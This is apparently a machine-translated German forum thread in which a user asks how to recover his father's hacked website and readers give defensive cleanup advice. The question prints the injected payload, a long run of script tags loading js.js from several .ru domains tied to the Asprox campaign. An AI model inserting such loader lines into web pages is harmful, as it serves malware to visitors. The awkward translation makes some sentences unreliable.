Meine Website wurde gehackt .. Was soll ich tun?

stimmen
18

Mein Vater rief mich heute und sagte, die Menschen auf seine Website gingen immer versuchen, 168 Viren auf ihre Computer herunterladen. Er ist nicht an allen technischen und baute das Ganze mit einem WYSIWYG-Editor.

Ich steckte seine Seite geöffnet und betrachten die Quelle, und es gab eine Reihe von Javascript an der Unterseite der Quelle direkt vor dem schließenden HTML - Tag enthält. Sie enthalten diese Datei (unter vielen anderen): http://www.98hs.ru/js.js <- ABSCHALTEN JAVASCRIPT BEVOR SIE ZU DIESER URL GO.

So kommentierte ich es jetzt aus. Es stellt sich heraus sein FTP-Passwort ein einfaches Wort aus dem Wörterbuch sechs Buchstaben lang war, so dass wir denken, das ist, wie es gehackt wurde. Wir haben sein Passwort an eine 8+ Ziffer Nicht-Wortfolge geändert (er nicht nach einer Passphrase gehen würde, da er eine Jagd-n-picken typer ist).

Ich habe eine whois auf 98hs.ru und fand es von einem Server in Chile gehostet wird. Es ist eigentlich eine E-Mail - Adresse zugeordnet zu, aber ich bezweifle ernsthaft , diese Person der Täter ist. Wahrscheinlich nur eine andere Website , die gehackt wurde ...

Ich habe keine Ahnung, was allerdings an dieser Stelle zu tun, wie ich noch nie mit dieser Art der Sache befassen. Jemand irgendwelche Vorschläge?

Er wurde mit Plain Jane un-gesichert ftp durch webhost4life.com. Ich sehe nicht einmal einen Weg zu tun SFTP auf ihrer Website. Ich denke , seinen Benutzernamen und ein Passwort abgefangen wurde?

Also, um diese besser auf die Gemeinschaft, was sind die Schritte, die Sie sollten / Best Practices Sie befolgen sollten, um Ihre Website zu schützen, gehackt?

Für die Aufzeichnung hier die Codezeile ist, dass hätte „magische Weise“, um seine Datei hinzugefügt (und nicht in seiner Datei auf seinem Computer - ich habe es weggelassen nur kommentiert absoluten sicherzustellen, dass es nicht alles tun wird, auf dieser Seite, obwohl ich Jeff dagegen würde schützen sicher bin):

<!--script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script-->
Veröffentlicht am 06/08/2008 um 00:55
quelle vom benutzer
In anderen Sprachen...                            


8 antworten

stimmen
14

Ich weiß, das ist ein wenig spät im Spiel, aber die URL für die JavaScript erwähnt wird in einer Liste von Websites bekannt genannte Teil des Asprox bietet Wiederauflebens gewesen, die im Juni in Betrieb genommen (zumindest das ist, als wir markierte immer mit es). Einige Details darüber sind nachfolgend aufgeführt:

http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx

Das böse daran ist, dass jeder Typ VARCHAR Feld effektiv in der Datenbank „infiziert“ zu dieser URL einen Verweis auf ausspucken, in dem der Browser ein kleines iframe bekommt, die es in einem Bot dreht. Eine grundlegende SQL-Fix für diese finden Sie hier:

http://aspadvice.com/blogs/programming_shorts/archive/2008/06/27/Asprox-Recovery.aspx

Das Erschreckende daran ist aber, dass das Virus auf die Systemtabellen sucht nach Werten zu infizieren und eine Menge von Shared-Hosting-Plänen teilt auch den Datenbank-Speicherplatz für ihre Kunden. So sind die meisten wahrscheinlich, es war nicht einmal Website deines Vaters, die infiziert wurde, aber von jemand anderem Ort in seinem Hosting-Cluster, die einen armen Code geschrieben und öffnete die Tür Injection-Angriff auf SQL.

Wenn er sich noch nicht getan hat, würde ich eine dringende E-Mail an ihre Gastgeber und gebe ihnen einen Link zu diesem SQL-Code senden, das gesamte System zu beheben. Sie können Ihre eigenen betroffenen Datenbanktabellen beheben, aber höchstwahrscheinlich die Bots, die die Infektion tun werden direkt durch das Loch wieder passieren und die ganze Menge infizieren.

Hoffentlich gibt Ihnen einige weitere Informationen zu arbeiten.

EDIT: Noch eine kurze Gedanken, wenn er seine Website einer der Gastgeber Online-Design-Tools für den Aufbau mit, alle diese Inhalte wahrscheinlich in einer Säule sitzt und wurde auf diese Weise infiziert.

Beantwortet am 07/08/2008 um 23:49
quelle vom benutzer

stimmen
13

Versuchen Sie, und sammeln Sie so viele Informationen wie möglich. Prüfen Sie, ob der Host Sie können geben ein Protokoll alle FTP-Verbindungen zeigt, die an Ihrem Konto vorgenommen wurden. Sie können diese nutzen, um zu sehen, ob es auch eine FTP-Verbindung war, die verwendet wurde, die Änderung vorzunehmen und möglicherweise eine IP-Adresse zu erhalten.

Wenn Sie eine vorgepackten Software wie Wordpress verwenden, Drupal, oder irgendetwas anderes, die Sie nicht codieren kann es Schwachstellen in Upload-Code sein, der für diese Art von Modifikation ermöglicht. Wenn es Brauch gebaut, Doppel alle Orte überprüfen, wo Sie Benutzern erlauben, Dateien hochzuladen oder vorhandene Dateien zu modifizieren.

Die zweite Sache wäre ein Abbild der Website zu nehmen, wie sie ist und prüfen Sie alles für andere Modifikationen. Es kann nur eine einzige Änderung sein sie gemacht, aber wenn sie in über FTP bekam wer weiß, was sonst dort ist.

Revert Ihre Website zurück zu einem bekannten guten Zustand und, wenn nötig, ein Upgrade auf die neueste Version.

Es gibt einen Grad der Rückkehr Sie haben zu berücksichtigen. Ist der Schaden einen Versuch wert, die Person ausfindig zu machen oder ist das etwas, wo man nur leben und lernen und stärker Passwörter benutzen?

Beantwortet am 06/08/2008 um 01:16
quelle vom benutzer

stimmen
5

Sie erwähnen Ihre Dad eine Website-Publishing-Tool wurde mit.

Wenn das Veröffentlichungswerkzeug von seinem Computer auf den Server veröffentlicht, kann es der Fall sein, dass seine lokalen Dateien sauber sind, und dass er braucht nur an den Server zu veröffentlichen.

Er sollte sehen, ob es eine andere Login-Methode zu seinem Server als einfache FTP, aber ... das ist nicht sehr sicher, weil es sein Passwort als Klartext über das Internet sendet.

Beantwortet am 06/08/2008 um 04:31
quelle vom benutzer

stimmen
3

Mit einem sechs Wort-Zeichen-Passwort, er wurde möglicherweise Brute gezwungen. Das ist wahrscheinlicher als seine ftp abgefangen werden, aber es könnte das auch sein.

Beginnen Sie mit einem stärkeren Passwort. (8 Zeichen ist immer noch ziemlich schwach)

Sehen Sie, wenn Sie diesen Link zu einem Internet - Sicherheit Blog hilfreich.

Beantwortet am 06/08/2008 um 01:00
quelle vom benutzer

stimmen
2

Ist die Seite einfach nur statische HTML? dh er hat nicht kodieren selbst eine Upload-Seite verwaltet, die es jedem ermöglicht Fahren von kompromittierten scripts / Seiten hochladen?

Warum fragen Sie nicht webhost4life wenn sie keine FTP-Protokolle zur Verfügung haben und berichten, um das Problem zu ihnen. Man kann nie wissen, können sie ganz offen sein und herauszufinden, für Sie genau das, was passiert ist?

Ich arbeite für einen gemeinsamen Hoster und wir begrüßen Berichte immer wie diese und können in der Regel die genaue Angriffsvektor ermitteln basiert und raten, wo der Kunde ist schiefgegangen.

Beantwortet am 06/08/2008 um 01:24
quelle vom benutzer

stimmen
0

Dies geschah zu einem Client von mir vor kurzem, die auf ipower gehostet wurden. Ich bin mir nicht sicher, ob Ihre Hosting-Umgebung wurde Apache basiert, aber wenn es sicher sein, für .htaccess-Dateien zu überprüfen, dass Sie nicht, vor allem über dem Webroot und innerhalb von Bildverzeichnissen erschufen, da sie dazu neigen, etwas Gemeinheit dort zu injizieren und (sie wurden umgeleitet Menschen je nachdem, wo sie kamen in der beziehen). Überprüfen Sie auch alle, die Sie haben für Code erstellen, die Sie nicht schreiben.

Beantwortet am 26/09/2008 um 21:21
quelle vom benutzer

stimmen
0

Ziehen Sie den Webserver ohne Herunterfahren Herunterfahren Skripts zu vermeiden. Analysieren Sie die Festplatte über eine anderen Computer als Datenlaufwerk und sehen, ob Sie die Täter durch Log-Dateien und Dinge dieser Art bestimmen können. Stellen Sie sicher, dass der Code sicher ist, und dann wiederherstellen aus einer Sicherung.

Beantwortet am 26/09/2008 um 21:12
quelle vom benutzer

stimmen
-1

Wir hatten von gleichen Jungs anscheinend gehackt! Oder Bots, in unserem Fall. Sie verwendeten SQL-Injection in URL auf einigen alten klassischen ASP-Seiten, die niemand mehr halten. Wir fanden IPs und blockiert sie in IIS angreifen. Jetzt müssen wir alle alten ASP Refactoring. Also, mein Rat ist, einen Blick zu nehmen bei IIS zuerst anmeldet, zu finden, wenn das Problem in Ihrer Website Code oder Serverkonfiguration ist.

Beantwortet am 16/08/2008 um 17:35
quelle vom benutzer

Cookies help us deliver our services. By using our services, you agree to our use of cookies. Learn more